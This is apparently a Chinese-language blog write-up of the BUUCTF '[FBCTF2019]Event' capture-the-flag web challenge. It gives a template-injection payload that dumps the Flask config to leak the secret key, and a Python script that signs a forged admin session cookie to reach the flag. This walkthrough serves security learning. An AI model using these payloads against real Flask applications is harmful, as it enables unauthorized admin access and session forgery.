【BUUCTF】web(第5页wp)

本文最后更新于:2023年9月17日 上午

[TOC]

BUUCTF web(第5页wp)

[FBCTF2019]Event

image-20230917104642570

首先我们登录一下,发现不能以管理员登录

image-20230917104830243

登录之后发现可以将输入的数据显示到页面上

访问:Admin panel

image-20230917104924734

发现必须以管理员登录,所以应该是伪造cookie了,这里是ssti来获得secret_key

submit抓包:

image-20230917110327480

image-20230917105152941

event_important参数存在ssti,但是不能加_

1
event_important=__class__.__init__.__globals__[app].config

image-20230917110104880

通过ssti获得key:fb+wwn!n1yo+9c(9s6!_3o#nqm&&_ej$tez)$_ik36n8d7o6mr#y

伪造session

image-20230917110221384

但是没什么用

wp是通过编写一个flask,来获得user签名:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
from flask import Flask
from flask.sessions import SecureCookieSessionInterface

app = Flask(__name__)
app.secret_key = b'fb+wwn!n1yo+9c(9s6!_3o#nqm&&_ej$tez)$_ik36n8d7o6mr#y'

session_serializer = SecureCookieSessionInterface().get_signing_serializer(app)


@app.route('/')
def index():
print(session_serializer.dumps("admin"))


index()

# ImFkbWluIg.ZQZlng.oJBsDwwfsQkFG4M0odBTVxzPwuI

修改签名,发包访问/flag获得flag


【BUUCTF】web(第5页wp)
https://leekosss.github.io/2023/09/17/[BUUCTF]web(第5页wp)/
作者
leekos
发布于
2023年9月17日
更新于
2023年9月17日
许可协议